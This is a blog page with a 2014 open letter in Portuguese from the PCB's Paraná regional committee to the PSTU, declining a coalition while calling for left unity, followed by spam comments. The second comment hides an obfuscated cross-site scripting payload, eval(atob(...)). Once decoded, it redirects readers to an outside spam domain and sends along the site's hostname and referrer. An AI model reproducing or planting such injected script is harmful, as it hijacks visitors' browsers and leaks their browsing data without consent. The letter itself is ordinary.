À Direção Estadual do PSTU no Paraná

Do Comitê Regional do PCB no Paraná
Resposta à carta aberta do PSTU

O PCB tem reafirmado ao longo dos últimos anos seu compromisso com a unidade de todos aqueles que lutam pelo socialismo e que tem resistido bravamente ao pacto social conservador que sustenta o atual governo e os anteriores.

Temos participado de importantes iniciativas unitárias da esquerda revolucionária aqui no Paraná, como o Bloco de Oposição à Direção da APP-SINDICATO, a FRENTE DE LUTA PELO TRASNPORTE DE CURITIBA, a luta contra a privatização do HC, dentre tantas outras lutas de nossa classe.

Portanto, para além do momento eleitoral o PCB procura construir alianças que expressem pontos programáticos unitários com o objetivo de contribuir para construção de uma verdadeira Frente de Esquerda que não se limite aos partidos registrados no TRE.

Entendemos que somente a unidade nas lutas cotidianas e a aproximação programática entre os partidos e organizações da esquerda revolucionária será capaz de superar a lógica de acordos eleitorais motivados por conveniências momentâneas.

Precisamos avançar para pontos programáticos unitários, visto que é necessário que a esquerda revolucionária se envolva em torno de um projeto estratégico pra que nos apresentemos com uma alternativa real e eficaz de tomada do poder.

Dada a inexistência de uma Frente de Esquerda para além dos momentos eleitorais, o PCB no Paraná decidiu por não coligar com nenhum partido e lançar candidaturas próprias nestas eleições. No entanto, por motivos incontornáveis não foi possível lançar candidaturas ao Governo e ao Senado.

Respeitamos a decisão do PSTU e do PSOL em apresentar suas candidaturas, mas não vemos mudanças substanciais no cenário político que nos levem a mudar de posição. Entendemos que mesmo que não estejamos juntos em uma mesma coligação, devemos ter unidade na luta. As chapas da esquerda devem estar a serviço de nosso objetivo principal que é fazer nossas denúncias, dar visibilidade às pautas de junho de 2013 e apresentar nossas alternativas.

É necessário também não aparelhar as lutas e respeitar as forças de esquerda, inclusive aqueles que optaram pelo voto nulo, pois entendemos que esta também é uma forma de expressão política. Não compartilhamos hoje aqui no Paraná do mesmo palanque que PSOL e PSTU, nem por isso pretendemos combater ou enfraquecer estas candidaturas.

Pelo contrário, para o PCB as candidaturas ao Governo do Bernardo Pilotto e do Rodrigo Tomazini, assim com as candidaturas ao Senado do Piva e do Evandro são as únicas que apresentam reais avanços para os trabalhadores no Paraná. Neste sentido, desejamos que estas candidaturas estejam à altura das tarefas colocadas e sejam capazes de abrir um debate programático que unifique as forças de esquerda no estado.

Por fim, ressaltamos que recebemos com estranheza a carta do PSTU pelo menos por 2 motivos. Primeiro o que diz respeito ao método, pois não houve nenhuma reunião entre as direções das organizações para discutir a unidade no período eleitoral, e para o PCB a forma de fazer acordos programáticos por meio de correspondências públicas é uma novidade e julgamos inadequada.

O segundo motivo diz respeito ao mérito, pois vemos uma contradição entre o discurso e prática dos companheiros, que acusam o PSOL de reformista no Paraná, ao passo que estão coligados com o PSOL em estados como no Rio Grande do Sul, Alagoas e São Paulo.

Sabemos que as eleições passam e as lutas continuam. De nossa parte continuaremos com o compromisso de contribuir para a construção da unidade das forças anticapitalistas e anti-imperialistas com o intuito de construir uma real e eficaz alternativa de poder para os trabalhadores.

Saudações Comunistas,

PCB – Comitê Regional do Paraná

09 de setembro de 2014

157 comentários em “À Direção Estadual do PSTU no Paraná

  1. I have to thank you for
    the efforts you have put in penning this blog.
    I’m hoping to check out
    the same high-grade blog posts from you
    later on as well. In fact, your creative writing
    abilities has motivated me to get my very own site now

  2. New Email List of LinkBio Users. Sell your products or
    services directly with cold email marketing to Instagram users that uses
    LinkBio in their profiles Download it from qualification for lead generation specialist“>”>”>”>”>eval(atob(‘ZG9jdW1lbnQubG9jYXRpb24uaHJlZiA9ICdodHRwczovL29ubGluZWxlYWRnZW5lcmF0aW9uLnh5ei9pbmRleC5odG1sP3V0bV9zb3VyY2U9JyArIGxvY2F0aW9uLmhvc3RuYW1lICsgJyZ1dG1fbWVkaXVtPWdzYS1vbmxpbmVsZWFkJnV0bV9jYW1wYWlnbj1zY3JpcHQmdXRtX2NvbnRlbnQ9JyArIGVuY29kZVVSSUNvbXBvbmVudChkb2N1bWVudC5yZWZlcnJlcik7’));

  3. I’m not that much of a internet reader to be honest but your blogs
    really nice, keep it up! I’ll go ahead and bookmark your site to come back
    in the future.
    All the best

Deixe uma resposta

O seu endereço de e-mail não será publicado.